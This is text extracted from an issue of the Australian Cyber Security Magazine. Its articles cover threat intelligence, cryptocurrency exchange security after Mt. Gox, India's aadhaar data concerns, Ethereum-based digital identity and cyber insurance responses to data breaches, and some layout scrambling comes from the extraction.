The Who - Not the band (for those of us old enough to remember) As a cyber professional, one of our main objectives is to confirm the right people are accessing and using the right information, that it’s available when they need it and is accurate. If that’s our objective, then conversely, we also need to be able to identify when it’s the wrong people, wrong or inaccurate information. That’s done by identifying the threat actor, through threat intelligence.
Cyber Security
then trying to make sense of it, take a step back and look at what you’d like to measure. To do that we look at a given business problem - take Spear-Phishing as an example, from our last Global Threat Intelligence Report, phishing accounted for 73% of malware delivered to organisations. The attack chain can vary, but is reasonably consistent, simplistically, someone finds information about an employee, sends a crafted email either with payload or a link, malware is downloaded or credentials stolen and voila! So, we know what they’re doing, and how they’re doing it, and so this is where we have an advantage. Payload or content information is great, but is usually at or near the end of the chain, and as we know struggles to cater for increasingly bespoke attacks. However, if we can identify indicators in the sequence of events within the attack chain then we have more opportunities to stop the bad guys. The challenge is that while an IoC is based on validated data, many other indicators do not, and as such might not be able to be acted upon alone. By definition though, this is where Threat Intelligence should be, it’s about deriving an opinion to take action based on context, not just the end result. To use an analogy; A battle is not won by understanding the bomb, its won by knowing there’s an unidentified plane flying nearby, where it took off from, the fuel that was ordered and flight plan, or the command to plan the mission. The further we get up the chain of events the better.
The Response
We’ve all heard of an indicator of compromise (IoC), a metric, something that can be measured, which alludes to a host being in a compromised state. Most technologies we know rely on these measures – a pattern, source, destination, sequence of actions – to take some action in response. IoC’s are important, because they add a certain level of certainty to any ‘hit’, however, whilst actors may often use the same techniques, an IoC alone is arguably reactive, someone had to have done it before, to identify it as a compromise and define a measure. Thankfully there are many indicators in life, and a strong threat intelligence capability is borne out of others, such as opportunity, intent, financial, success or even personnel engagement. Imagine for one moment that you knew an employee was being coerced by a competitor or was in financial difficulty. What about that supplier who’s been letting things slip on social media – would that influence your assessment of the threat?
The Sequence Rather than trying to gather some or all of the information,
Looking at a sequence of events, even at a high level, we can determine things we can measure. If we take Spear-Phishing again; has there been any whisper of an acquisition, or presence in the news? Can information be obtained from public profiles of personnel or a family member? Did a supplier announce a contract or have you listed as a customer? Has there been any chatter in actor communities about the company, supplier or personnel? Is the employee happy? All these things provide an indication of the initial stages of an attack, and can be referenced to measures further down the chain; do we know what an actor is targeting? Do we see email from someone we don’t have a relationship with? Does a web page have a logon? Has it been used before? Have credentials been used on a host before? What time of the day, location, or session `duration? Have new bank details been added to the system? Is there a new binary we haven’t seen before? The list goes on, and however you categorise them, be they as indicators of risk and opportunity, threat, compromise, fraud or personnel engagement, the objective is the same – know what to measure, where to get it, how to determine a level of assurance, and how to use it. Context is king and invaluable in supporting triage and response efforts, and an organisation that leverages threat intelligence successfully, constantly evaluates the threat landscape, informing the business on how to defend in the most effective way with the resources available. So, next time you’re asked, “Are we prepared?” be the one with the reports ready to go, don’t be the one being told you’re not compliant, or that your information is out there.
Australian Cyber Security Magazine | 57
Cyber Security
Cryptocurrency Insecurity Mt. Gox, where are our bitcoins?
By Guillaume NoĂŠ
Mark Karpeles bowed in front of the Japanese press with his eyes closed. He looked deeply humbled and uncomfortable. He was apologising to his clients for having lost 750,000 of their bitcoins, and an extra 100,000 bitcoins owned by his company. Karpeles was the CEO of the Mt. Gox, a bitcoin exchange based in Tokyo, Japan. By 2013, Mt. Gox was the biggest bitcoin exchange in the world, handling 70% of global bitcoin trading. At a press conference on February 28, 2014, Karpeles referred to some "weakness in the system" and blamed hackers for the loss. At the time, the lost 850,000 bitcoins were worth $473M USD. By early November 2017, those bitcoins would have been worth $5.57B USD. The Mt. Gox's clients impacted by the loss have been denied a substantial profit from their early investment in the cryptocurrency. Hackers allegedly exploited an application business logic vulnerability on the exchange trading web app. Tokyo security company WizSec investigated the case and concluded that most or all of the missing bitcoins were stolen straight out of the MtGox hot wallet over time, beginning in late 2011. When discovered and reported in February 2014, it was a disaster overnight. The exchange shut down. Mt. Gox filed for bankruptcy and left many of their clients short of their valuable bitcoins. There is more to the story of Karpeles and Mt. Gox. 100,000 client bitcoins were eventually recovered. Karpeles was also found guilty of fraud, embezzlement and financial mismanagement in a charge unrelated to the missing
58 | Australian Cyber Security Magazine
client bitcoins. He ended up in prison. The case of Mt. Gox shook the cryptocurrency ecosystem and created a strong precedent with the risks of cryptocurrencies.
Cryptocurrency security risks Bitcoin and other cryptocurrencies are fast growing in popularity and not only with high-risk investors. They are becoming mainstream and they are offering a valid
Cyber Security
payment option with the likes of Microsoft, Dell, Expedia and a growing number of businesses, including in Australia (see coinmap.org). Christine Lagarde, the Head of the International Monetary Fund (IMF), suggested that virtual currencies could offer better value, better payment services and would present a fresh idea to central bankers. At the time of writing, and through a non-exhaustive research, I quickly accounted for 15 exchanges covering Australia and 22 cryptocurrency ATMs deployed nationally (cointatmradar.com). Of the 15 exchanges, 5 were Australian companies. A joint venture between StarGroup and DigitalX is also reported to be in the process of equipping 2,900 existing traditional ATMs with two-way bitcoin transaction functionality to buy and sell the cryptocurrency in many places in Australia. However, cryptocurrencies are virtual assets managed in an unregulated financial system. They are high risk. They can disappear very quickly when their security is compromised and a humble apology from a CEO may be all there is to get as a consolation. The security risks I associate with cryptocurrencies include: 1. Failure of the blockchain - Unlikely. This risk is very unlikely due to the blockchain architecture, especially with common cryptocurrency blockchains with large groups of participating nodes. 2. Failure of the exchange - Possible. This risk is clearly possible. There are precedents of exchanges being hacked, such as Mt. Gox. Exchange hot wallets have been compromised. 3. Failure of the wallet - Likely. This risk is likely. Hot wallets with no backups are simply lost. Unsecured wallets can be compromised through vulnerabilities applying to the endpoint (e.g. mobile phone), the wallet software and of course the user and how they protect their wallet private keys. Michel Sassano recently published an amazing article reporting on how his team managed to recover a wallet private key from a screenshot image of a live TV program broadcasted in France. 2. The image of a bitcoin wallet private key QR code and string had been purposely obfuscated. However, the picture was not obfuscated well enough and led to the private key recovery through an 8-step process and a bit of luck. The wallet contained a value of $1,000. This report clearly highlights the risk of wallet protection failure, through private key compromise.
My initiation to cryptocurrencies I strongly associate Karpeles apology picture with the risks of cryptocurrencies. Being cyber security conscious, and without an ounce of a gambler in me, I had never been tempted to risk my money with any virtual currencies, until recently. I finally resolved to give it a shot and to reflect on the experience. The plan was simple. I had to procure some bitcoins and buy something with them.
Choosing an exchange Before entrusting my money to a cryptocurrency exchange,
I did some research and down-selected two exchanges. My selection was based on online reviews, some articles and forum discussions that I read. I paid attention to the volumes the exchanges trade and their lack of mentions in hacking news. I also considered their transaction fees, but it wasn't a critical factor in my selection. The first exchange I selected is based in Australia and the second one in the USA. I then proceeded to register myself to the 2 exchanges.
Registering The process was similar between the 2 exchanges and included the following steps: 1. Register basic account details. Set username (email address) and password, and verify the email address. 2. Setup two-factor authentication. Exchange #1 uses SMS OTP. Exchange #2 uses Google Authenticator. 3. Verify identity. The process was similar in approach and involved submitting some pictures of identity documents that are subject to verification. - Exchange #1 required 3 documents: a driver’s license, a photo of myself holding an A4 piece of paper with a handwritten note stating my identity and including a secret code I was provided on the document upload page, and a recent utility bill. The verification process took about 1 week to complete. It finished with a phone call with an operator asking further questions including: Was the account for me or somebody else? And did I intend to invest my superannuation (pension) fund in cryptocurrencies? - Exchange #2 required 1 document only: either a passport, a driver’s license or a photo ID. The verification process took about 2 minutes to complete. It seems the process was fully automated. I was actually curious to test the upload of a wrong picture (not an identity document) and it was not accepted. I then provided a correct ID document and it worked. There was no phone call.
Exchange security Exchange #1 had called me as part of the identity verification process. I answered their questions and I then took the opportunity to ask them some questions about the security of their exchange. I simply couldn't resist the opportunity to enquire. The operator who had called me was new to the company and she didn't know much about how they handled security. She offered me the option to get a call from her manager, which I accepted. The manager called me soon after and she very kindly indulged a 30-minute discussion, taking all my questions and answering them clearly and directly. She was very transparent on what they did and didn't do at a high level. At the end of the call, I was left with the following thoughts: • The exchange was transparent on security. I felt they were honest with me. I was also very thankful for the opportunity to discuss the subject with them openly. That
Australian Cyber Security Magazine | 59
Cyber Security was great customer service. • I didn't find comfort in their security story. I understood that they took the matter seriously. They had reportedly never been hacked. However, I didn't get a sense of any robust security risk management. There was no dedicated team or functions focusing on security. They also had no security certifications such as an ISO 27001. I don't value security certifications very highly, in the sense that they don't provide any guarantees, but in this case, it would have been something at least and an element of comfort. The key recommendation I was provided with was not to leave too much credit online, in their hot wallets, but to move it to cold storage instead (i.e. - don't leave too much money with us). It is indeed good advice. However, overall, I wonder whether she was the right person to communicate with on security. She may have undersold it to me and I was left with a persisting feeling of doubt. Aside of the phone call I got, exchange #1 does not have much information on their website about security at all. With exchange #2, I didn't get the opportunity of a phone call. However, their website Q&A did provide some valuable information, covering: • •
For users For novice cryptocurrency users like me, I would suggest: • Select the exchange thoughtfully. Do your research. Consider large reputed exchanges. Check the regulations applying to them. Check their security information (e.g. 2FA supported). You may ask them to subscribe to a cyber security insurance, providing some guarantee on your funds, and very importantly for them to store the majority of their client virtual funds in cold storage. • Set a strong password for your account. • Setup two-factor authentication. • Don't leave too much virtual funds on the exchange. Store your cryptocurrencies in cold storage (aka offline wallet). • When using your own wallets (e.g. on your mobile phone or desktop as opposed to on an exchange's wallet): - Encrypt your wallet with a strong password (that you don't forget!);
Insurance cover in case of a hack, and very importantly 98% cold storage. They would only store up to 2% of customer funds online and they would keep the rest in cold storage. Exchange #1 would not have such a practice - I had asked them the question.
- -
Buying cryptocurrencies - The exchanges I registered to support the following methods to procure cryptocurrencies: • Exchange #1: POLi payments, BPAY and cash deposit, • Exchange #2: credit/debit card only (at least for Australia). I went with exchange #2 for 2 reasons: 1. I was ready to transact in a matter of minutes of registration, because the identity verification process was automated (compared to a 1-week process with exchange #2); and 2. their security story gave me more confidence.
For exchanges If you are a new exchange, a start-up perhaps, you may find it beneficial to consider: • Taking security seriously. Dedicate some resources on the subject. Implement an ISMS; • Not storing all your clients' virtual funds in hot wallets (think Mt. Gox); • Subscribing to a cybersecurity insurance; • Attaining a security certification (e.g. ISO 27001); •
I registered a debit card and quickly procured a small amount of litecoins (LTC) and bitcoins (BTC). •
Using cryptocurrencies • I paid for my monthly private VPN fee with bitcoins, which also happens to be discounted when compared to using other currencies. It was very easy to do. The only inconvenience I experienced was a 35-minute delay for the transaction to be confirmed by 1 node, as a dependency from the recipient to acknowledge payment.
Cryptocurrencies security thoughts I am still a novice cryptocurrency user, but my initiation left me with the following thoughts.
60 | Australian Cyber Security Magazine
Backup your wallet regularly; Consider offline transaction signing (requires a computer disconnected from the network) or hardware wallets (e.g. Trezor) for higher security. Check Bitcoin.org or other sources for further advice on securing your wallet; and very importantly Do not share your private key. Keep it strictly confidential and safe.
Implementing an efficient and automated identity verification process, which is also better for customer experience; Providing a good Q&A on key security questions on your website; and Seeking advice to professional cyber security advisors.
About the Author Gui is a Cyber Security Advisor who delivers businessfocused Cyber Security and Technology services. He is passionate about the issues of Security & Privacy, and the process to address them in both business and personal contexts. As the General Manager for Pirean in Australia & New-Zealand, Gui leads Pirean’s business development in the region with Identity and Access Management technology and services.
App now available on iTunes & Google Play DOWNLOAD NOW!
www.australiancybersecuritymagazine.com.au Australian Cyber Security Magazine | 61
Cover Feature
Beyond the horizon insights: How India is coping with cyberthreats?
A By Sarosh Bana, Asia Pacific Security Correspondent
massive debate is raging across India on the rightwing Bharatiya Janata Party (BJP)-led government’s agenda on mining personal data for putting a mass surveillance system in place. The issue now lies before the Supreme Court that will be adjudicating on the necessity – and legality – of the 12-digit unique identification (UID) number called aadhaar that the government has mandated for availing of 139 essential services and schemes. These range from opening bank accounts, purchasing mobile phones and filing Income Tax returns to applying for permanent account numbers (PANs), house subsidies, even death certificates, subsidised foodgrain, healthcare and education for the desperately poor, booking train tickets, supplementary meals at crèches, and maternity benefits, vocational training and loans for underprivileged women. Requiring iris scan and fingerprinting, biometric-based aadhaar is a single authenticator of identity and domicile, but it can also be used as a customer verification mode and for maintaining profiles. It is, however, distinct from the US’s nine-digit social security number (SSN) launched in 1936 to ensure benefits and track individual earnings in the social security system. From 1961, it was used by the Internal Revenue Service for identifying taxpayers, just like aadhar today, prompting the Carter administration in 1977 to halt its use as a national identity document. The Social Security Administration also does not fingerprint SSN applicants, as this method is associated in the public mind with criminal activity. Today, an SSN is required to secure a job, and access social security benefits and some other government services. The fear that personal information can be compromised
62 | Australian Cyber Security Magazine
if aadhaar databanks are hacked has been validated by a study by Bangalore-based Centre for Internet and Society (CIS) that indicates data leakage of over 130 million aadhaar card holders from just four government websites. The data include bank account numbers. A 31-year-old man was also arrested in August for illegally and unauthorisedly accessing the UIDAI server. As many as 1.1 billion of India’s population of 1.34 billion have already enrolled in the aadhaar scheme. The petition before the Supreme Court contends that aadhaar enrolment, which was previously voluntary and then made compulsory and which requires biometric profiling, treats citizens as suspects and seeks their identification rather than their identity. It cites this world’s largest biometrics-based identity programme as one linking sufficient data to facilitate profiling as it can track one’s spending habits, contacts and assets, even trips overseas, apart from other intrusive information. In a previous related case, the Court noted that though information may exist in silos, it has the potential to profile every individual if interlinks are established. It deemed it easy for such personal data to be routed to state surveillance mechanisms through “state and non-state entities” holding that data. The Indian government’s push to advance digitisation (through its Digital India programme) has also raised questions on online vulnerability owing to possible threats of cyber attacks. Numerous cyber attacks affecting key infrastructure assets like ports and major payment companies have made headlines recently. In India’s social context, almost 70 per cent of transactions are cash-based, with the majority earning and making purchases in negligible amounts that do not require cheque or bank transfer payments. In fact, the
Cover Feature
demonetisation initiative of the government of November 2016 had digitisation as one key purpose. While demonetisation had a grievous fallout on the national economy and businesses, especially small businesses, one major beneficiary had been India’s largest digital payments company, Paytm, which reported a 700 per cent surge in traffic, and 1,000 per cent growth in transaction volumes post-demonetisation. While this company - majority of which is held by Chinese internet giant Alibaba and Japanese telecom major SoftBank, with its founder and CEO Vijay Shekhar Sharma holding only 19 per cent - had reported losses of Rs1,534 crore (A$ 313 million) in the year before demonetisation, recorded revenues of Rs814 crore (A$ 166 million) in the year after. Its net worth stands at Rs2,376 crore (A$ 485 million) and it now has over 220 million active wallet users. Recognising the importance of data protection and keeping personal data of citizens secure and protected, India’s Ministry of Electronics and Information Technology (MeitY) has constituted a Committee of Experts comprising members from the government, academia and industry to study and identify key data protection issues and recommend methods for addressing them. The committee will also suggest a draft Data Protection Bill. MeitY expects protection of data to provide a big boost to the digital economy of the country. The Ministry last month also approved a programme called Cyber Surakshit Bharat (Cyber Secure India) that has been proposed by an industry consortium led by Microsoft India. This programme will be executed in association with the National e-Governance Division (NeGD) to train the Chief Information Security Officers (CISOs) and other Information Technology officers of the Central and State governments, public sector banks and enterprises and other institutions to address cybersecurity challenges. Jan Neutze, Microsoft’s Director of Cybersecurity Policy for Europe, Middle East and Africa, deems cybersecurity a vital aspect of any economy that is digitising rapidly, especially at the rate India is currently seeing. He notes that in this push to advance digitisation, India has the opportunity to avoid some of the challenges and mistakes made by other countries and ensure that security is built into its framework right from the start, rather than bolt it on at the end. “The Cyber Surakshit Bharat initiative, for which Microsoft is a partner, seeks to build out the cybersecurity capacities of CISOs across the government by training 1,200 of them,” he says. “We think this initiative has great potential and we will see if we can replicate it elsewhere in the world.” Referring to the cyber threats and security issues for businesses and industries in India and the risks to the country, he mentions that while cybercriminals are becoming more sophisticated, threats are also emanating from hostile nation-states that are developing cyberoffensive capabilities. To tackle these challenges, Microsoft last year opened a Cyber Security Engagement Centre (CSEC) in India, its mission being to drive public-private partnerships that strengthen cooperation with Indian businesses, academic organisations and government on cybersecurity. “The CSEC
also aims to fight cybercrime by securing Indian computers and internet users from various cybercrime threats by bringing together experts such as security response experts, investigators and attorneys from Microsoft’s Digital Crime Unit,” says Neutze. “Cybersecurity challenges don’t stop at national borders, so you need a global network of capabilities, which is exactly what we have set up.” In this regard, Microsoft has opened Transparency Centres all over the world, in North and Latin America, Europe and Asia, which provide access not only to its source code, but also secure access to Microsoft experts. This ensures a global approach to cybersecurity that helps mitigate threats in one part of the world, and then extends this protection to customers in equal or equable ways around the world. “Microsoft’s Government Security Programme currently includes over 70 organisations in more than 40 countries,” observes Neutze. “We have over 3,500 internal security professionals that work on cybersecurity and cloud security at Microsoft, and invest over $1 billion on cybersecurity every year.” Rajesh Maurya, the Bangalore-based Regional Vice President for India and SAARC (South Asian Association for Regional Cooperation comprising eight memberstates) of California-based cybersecurity major Fortinet, finds hyperconnectivity and proliferation of online devices creating a criminal playground that is increasingly difficult to secure. “The proliferation of online devices accessing personal and financial information, and the growing connection of everything – from armies of IoT (internet of things) devices and critical infrastructure in cars, homes, and offices, to the rise of smart cities – have created new opportunities for cybercriminals and other threat actors,” he says. “The cybercriminal marketplace is adept at adopting the latest advances in areas such as artificial intelligence to create more effective attacks.” Fortinet’s just-released Global Enterprise Security Survey reveals that 87 per cent of Indian businesses surveyed are planning programmes in 2018 to educate employees in IT security, reflecting a growing awareness that breaches are caused by carelessness and ignorance as much as maliciousness. It also finds that 73 per cent of Indian IT decision makers (ITDMs) at 250+ employee organisations are confident in their cybersecurity posture, despite 84 per cent of organisations being breached in the past two years. Additionally, 96 per cent believe they are doing better than their peers with regards to cybersecurity, while only one per cent believe they are lagging behind. Respondents reveal that 39 per cent of breaches experienced in the last two years were the result of social engineering, ransomware and email phishing. “Another top concern for Indian organisations is protecting access to the network,” the study points out. “Only three quarters of ITDMs feel confident that they have full visibility and control of all devices with network access, and of the access level of all third parties who frequently have access to networks.” Besides, basic security measures like network segmentation are only being planned by 21 per cent of businesses in 2018. Without network segmentation, malware entering a network will often be left to spread.
Australian Cyber Security Magazine | 63
Cyber Security
SMART ID: Ethereum blockchain identity management
W By Annu Singh
e all know the mere mention of the words ‘Papers Please’ or ‘KYC’ (know your customer) conjures up an uncomfortable image of a pile of documents provided by individuals as proof of identity. This picture does not get any better with Financial Technology (FINTECH) and Regulatory Technology (REG TECH) firms investing significant money, effort and resources in verifying, validating, storing these identity proofs. Furthermore, duplicate records are maintained across the transaction lifecycle. Keeping information consistent and up-to-date becomes a big challenge and is a constant source of frustration, with extreme risks relating to loss of PII and identity fraud. Smart Identity is being looked at as a viable option for individuals, corporations and governments, as it helps introduce efficiencies into the process lifecycle of identity management and expedites verification and validation outcomes. First, let’s look at what Smart Identity is and how it works. Smart Identity (Smart ID) is the digital identity of an individual created using smart contracts based on Ethereum’s blockchain – one of the most well-known blockchain technologies. A smart contract, in layman’s
64 | Australian Cyber Security Magazine
terms, is a software program that is executed when defined conditions are met. To create Smart ID identity artefacts, known as attributes, such as birth certificates, driving licenses, addresses, passports etc., they are added by the identity owner to the blockchain and stored within the smart contract in the form of an immutable hash. Identity endorsement is performed by storing a corresponding endorsement hash against the attribute’s hash by the attesting authority, which normally is a third-party. Endorsements can be revoked by issuing authorities, if needed. Endorsements act as a notarised record of attestation by a third-party in relation to a specified attribute, stored with the attribute, within the identity contract. Attributes can be added, deleted or modified by the identity owners, but only while endorsements are added using the required public keys. Smart ID works as a universal electronic passport for identity representation and verification. Users have full control over who they share their information with and what attribute of information is shared. Smart ID reduces the dependency on centrally provided systems or services, such as the passport office, to acquire, use and verify identity information – so there are certainly applications for this kind
Cyber Security
“Be not another, if you can be yourself.” - Paracelsus
of service within the Federal government that have not yet been considered. Smart ID can also be used as a digital wallet for digital assets owned by an identity, as well as contracts for identity to a third party and as a controller to identity-linked distributed applications (known as Dapps). Smart ID needs to be easy to use and low cost for wider adoption, but the upside is it offers significantly enhanced security as the blockchain authenticates personal identity on an immutable, tamperproof ledger, by associating each identity with an encrypted code, for which only the individual controls the private key. Thus, private data (PII) remains under the complete control of the individual and is self- managed and certified. An Ethereum developer, Fabian Vogelsteller, proposed Ethereum Request for Comment (ERC725) to develop a standardised identity management system for humans and machines on GitHub in Oct 2017. Fabian proposed ERC725 as a standard function for a unique identity for humans, groups, objects and machines. This identity can hold keys to sign actions and claims (transactions, documents, logins, accesses, etc.,) which are attested to by third parties (issuers) or self-attested by the individual. They also serve
as a proxy function to act directly on the blockchain. Details can be found here: https://github.com/ ethereum/EIPs/issues/725. Interest in this RFC was so intense over the first 24 hours after submission that discussions went all over social media and it trended significantly on Twitter. This is a big deal. Digital identity opens door for wider integration into distributed master identity record management, which facilitates a number of areas like cross-border travel and immigration, access to financial services on relocation, creation of risk profiles, which can be used to personalise insurance products. It could also be used to transfer digital ownership of assets, IP, and provide access to government services and facilitate e-voting, all of which are areas that are being explored through other technology solutions. But none have the immutable qualities that blockchain can offer and none have the Smart Contract ecosystem that Ethereum offers. Due to its myriad advantages, many organisations and governments are exploring the Ethereum blockchain for identity management. Some major corporations, such as Deloitte, Cognizant, UPort, MONI and Persona are all researching and prototyping applications in this space. Zug, a region in Switzerland known as “Crypto valley” – the name was allegedly attributed to Ethereum’s co-founder Mihai Alisie (Ethereum HQ is in Zug) – has collaborated with UPort to use the Ethereum blockchain identity management to create self-sovereign digital identity of its residents. Using the UPort App citizens encrypt their personal information and receive an ID, which is linked to a cryptographic address on the Ethereum blockchain. This address is a Smart Contract address known as a UPort proxy contract. Once the information is verified by the city’s authorities, which needs to be done just once in person (presenting normal ID paperwork), users can then use e-services like residency proof, e-signature, parking fee payments, etc. Estonia is another such country with high adoption rates of blockchain technology – much of which is based on identity management (XROD) for its residents through their e-residency program. Finland uses Ethereum Smart ID for refugees’ identity management. Finland also provides asylum seekers with MONI debit cards, linked to their identity on the blockchain. Even their Immigration Services uses this to track both the spending and identity of these refugees, with the added benefit that the blockchain data is immutable and uncontestable. With Smart IDs, individuals can create and securely store a digital form of identification, that cannot be tampered with and is universally accessible. Smart IDs will need to be slowly incorporated along with existing ID Systems, by the institutions and not targeted as replacements for existing ID systems, for the technology to succeed. If done correctly this can have a far-reaching impact on how individuals, organisations & society validate & verify identity, conduct business and avail services at large. “I AM WHO I AM’ said GOD to Moses to assure him that God would become what they would need Him to become; but for rest of us lesser mortals we would need to continue to prove who we are and Smart ID would be a reality closer to home helping us do just that in near future.
Australian Cyber Security Magazine | 65
Cover Feature Cyber Security
Cyber Insurance A Buyer's Guide Part 3
I By Mark Luckin
n this third article in our series about cyber insurance, weâ&#x20AC;&#x2122;re looking at two publicised examples of how a Cyber & Privacy Liability Insurance policy might respond to certain instances of unauthorised access or data breaches. The first is caused by human error and the second looks at an attack from an intentional malicious third-party. Of note, whilst this refers to publicly available information with respect to potential policy application, assumptions are made, and all applications are entirely hypothetical. These hypotheticals assume the organisations have in place an equivalent market leading cyber insurance policy.
Red Cross: Human Error â&#x20AC;&#x201C; Data Breach On 5th September 2016, a database file containing information relating to approximately 550,000 prospective blood donors, who had entered their details into the Red Cross (the insured) website was saved to a public-facing web server. The file was inadvertently placed on the web server by an employee of a third party provider. As a result, the data file was discovered and accessed by an unknown individual on 25 October 2016. This lead to a data breach, which if occurred now, would potentially need to be notified to the OAIC and impacted individuals, under the recently introduced Mandatory Breach Notification scheme. The breach could also have a significant impact on the organisations reputation. The below outlines how a Cyber Insurance policy may respond in such an event, to assist an organisation in the event of a breach.
66 | Australian Cyber Security Magazine
Insuring Clause Whilst there is no standard Cyber Insurance wording within the Australian market, we assume the Red Cross has a market leading policy in place. The above scenario involves an event, loss or a claim that would potentially trigger a number of Insuring Clauses broadly covering: - Data asset loss/rectification costs; - Regulatory/privacy liability; - Third party liability. Once triggered, the above clauses respond in the unique capacity, in that provided is a potential promise to pay, but also a service team offering. The combination of such is outlined below.
First Party Loss With such a breach comes associated first party costs to investigate, contain, mitigate and remedy such an occurrence from an IT, IS, legal, communications and broader business perspective. Assuming a policy was in place, it has the potential to offer assistance in the following ways:
Immediate Costs Once the insured is made aware of the breach, their Insurerâ&#x20AC;&#x2122;s Response Team is contacted for assistance. In this scenario the insured has already met and familiarised
Cyber Security
themselves with the Breach Response team, allowing initial contact in the event of the breach to be streamlined and efficient. As previously outlined the response team consists of IT, legal, communications and other professional service vendors to assist in the event of the claim. - Immediately, an IT Forensic Response team is engaged to determine the scope, cause and extent of such a breach. Further the team is to engage and stop any continuation of such a breach and assist in minimising the resulting harm. The team works with the organisation’s internal IT group, with their services being completely covered under the policy. Despite the breach being the fault of a third party, the policy in place is still triggered, as the insured have sought implementation of a market leading policy, providing cover for their own breaches and third party breaches of their data. - Simultaneously, a Law Firm is engaged to advise the organisation to assist in: o Determining immediate legal obligations/ requirements under the Privacy Act and the Mandatory Breach Notification Scheme; o Determining any immediate legal obligations to third parties; o Assist and provide advice with any other immediate regulator/legal advice associated with the breach; - Public relations/communications experts are also engaged to minimise reputational impact of the incident, by providing assistance in formulating appropriate and immediate communication and delivery around the incident to the public and impacted individuals.
Slow Burn Costs Following the immediate response over a period of days, weeks and potentially months, the claims response team remains engaged in varying capacities:- Forensic IT assessment of information accessed continues to ensure the insured has a full (as possible) understanding as to the severity of the breach and obtain a full understanding of the amount and type of data breached. - Depending on what information was involved in the breacho Credit monitoring services are engaged for any affected individuals. o Identity theft monitoring services are engaged for affected individuals. - Costs to set up and operate a call centre for inquiries by impacted individuals are covered. - Public relations/Communications experts continue to be engaged to minimise reputational impact of the incident by providing ongoing assistance with respect to communication/releases around the incident, helping to mitigate reputational damage. - Legal advice/consultation continues to assist with- o Assisting with the assessment period under the new scheme. o Assisting with any legal obligations to notify
o
affected individuals and the OAIC. Continued assistance/advice with any other immediate regulator/legal advice associated with the breach.
Third Party Loss In addition to First Party Loss sustained by the insured, this breach of personal information can lead to third party liability exposure. In this sense, the policy has the potential to assist the insured in the following ways: - Defence expenses arising from regulatory investigation. The insured may find themselves party to an investigation from the OAIC, especially given the introduction of the new scheme. Legal costs associated with advice and assessment under the new scheme would be covered. o Should a claim then arise with a regulator pursuing action resulting from a breach, associated costs and any monetary fine or penalty (as uninsurable by law) would be covered under the policy. - Non-regulatory action may also be pursued by third parties, resulting from the data breach. Defence and settlement costs for associated claims would also be covered. Note coverage is afforded for claims only arising as result of a defined breach or wrongful act.
Business Interruption In the above instance, there has been no business interruption loss, however, the policy remains ready to respond. Important notes The above situation acts as an important reminder that the outsourcing of services, including the storage of data, does not necessarily negate responsibility for the original data holder, and that a correctly implemented policy can respond in such an instance. NotPetya: Attack/Human Error – Unauthorised Access On June 2017 the NotPetya attack was launched and targeted Microsoft Windows-based systems, infecting the master boot record to execute a payload. Such payload encrypted organisations systems, preventing Windows from booting. It subsequently demanded that the user make a payment in Bitcoin, in order to regain access to the system. Publically available information pointed to the fact that the global Law Firm DLA Piper was impacted by such an attack. The above scenario is unique as it contains elements of an “attack” as such and human error. The paragraph below talks about a hypothetical situation, as to how a Cyber Insurance policy may have assisted at the commencement, during and the aftermath of such an incident.
Insuring Clause The above again assumes the insured has a market leading
Australian Cyber Security Magazine | 67
Cyber Security
policy in place. The above scenario involves an event, loss or a claim, that would potentially trigger a number of Insuring Clauses broadly covering: - Data Asset Loss/Rectification Costs. - Extortion Costs. - Business Interruption Loss. - Regulatory/Privacy Liability. - Third Party Liability. Once triggered the above clauses respond in the same unique capacity as outlined below.
First Party Loss There is an obvious immediate impact on an organisation, by such an event, including unauthorised access to their systems, lack of access and potential data loss/breach. Immediate Costs Again, once the insured becomes aware of the incident, the incident response team is engaged, aiding by: - IT/forensic consultants are engaged assess backup capabilities and simultaneously assess the ransomware, analyse impact, and calculate extent of the potential impact and/or loss. - Costs associated with addressing the extortion threat to release information or malicious code unless extortion monies are paid o Potential payment of the ransom is considered here, should this prove to be the most appropriate course of action. - Simultaneously, a Law Firm is engaged to advise the organisation to assist in: o Determining any immediate legal obligations to associated third parties whose data may have been breached. o Determining legal obligations under the Privacy Act and the Mandatory Breach Notification Scheme. o Assist with any other immediate regulator/legal advice associated with the breach. - Public relations/communications experts are also engaged to minimise reputational impact of the incident by providing assistance in formulating appropriate and immediate communications and delivery around the incident. Slow Burn Costs - IT/IS assistance remains and over the following days/ weeks/months assists with o Recovery costs to remove malware, reconstruct insured data and assist with restoration including decontamination and recovery. o Software restoration (computer hardware if required). IT assistance in returning systems to pre-incident level follow a cyber incident. This can include assistance with restoration of systems and data as well as associated IT forensic costs. - Communications experts remain engaged for the period of outage, assisting in delivering the right messages and updates to all involved/impacted parties associated with
68 | Australian Cyber Security Magazine
-
the incident, helping to mitigate reputational damage. Legal advice/consultation continues to assist with o Ongoing advice with respect to any regulator risk or third party liability associated with the breach.
Third Party In addition to First Party Loss sustained by the insured, this breach of personal information can lead to third party liability exposure. In this sense, the policy has the potential to assist the insured in the following ways: - Defence expenses arising from regulatory investigations. The insured may find themselves party to an investigation from a number of different regulators, dependant or organisation type and industry. Legal costs associated with advice resulting from potential or actual liability arising from actions of regulators, resulting from the incident would be covered. o Should a claim then arise with a regulator pursuing action resulting from a breach, associated costs and any monetary fine or penalty (as uninsurable by law) would be covered under the policy. - Separate action may also be pursued by third parties, resulting from the incident. This may be due to various obligations, contractual or otherwise owed to such parties. Cover is afforded for damages sought through written demand or a civil or administrative proceeding resulting from a breach or wrongful act. Defence and settlement costs for associated claims would also be covered.
Business Interruption Unfortunately, unlike our first scenario, the insured faces a legitimate business interruption exposure. An ability to access systems, and associated data could prove to have a significant impact on the ongoing viability of the organisation. Fortunately, the policy responds to provide the following coverage: - Loss of net income. During the period that the business interruption is first discovered and until net income levels return to the levels they would have been if it wasnâ&#x20AC;&#x2122;t for such an event, the policy will respond to provide loss of net income during this period. - Cover for additional costs required to continue normal business operations (as a direct result of the interruption) during this period is also provided. This can include costs for items such as payroll and costs around the functionality and/or service of the insuredâ&#x20AC;&#x2122;s business.
Summary The above outlines a hypothetical application of a policy to two well publicised incidents. As can be shown, a correctly implemented and tailored policy can afford an organisation a broad remit of cover and assistance in the event of a cyber and/or privacy related incident. These policies will work most effectively with organisations which approach cyber and privacy risk as a whole-of-organisation risk, educating all staff and addressing the risk at a board level.
INNO VATE
Cover Feature
HOW ARE YOU MANAGING YOUR CYBER RISK? Attend the most comprehensive cyber conference in Australia! Participate in business tracks free of technical language, hear from international thought leaders in cyber and engage in workshops and training to equip you with a better understanding of how you can manage this risk.
Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today and access the many benefits received by our membership network
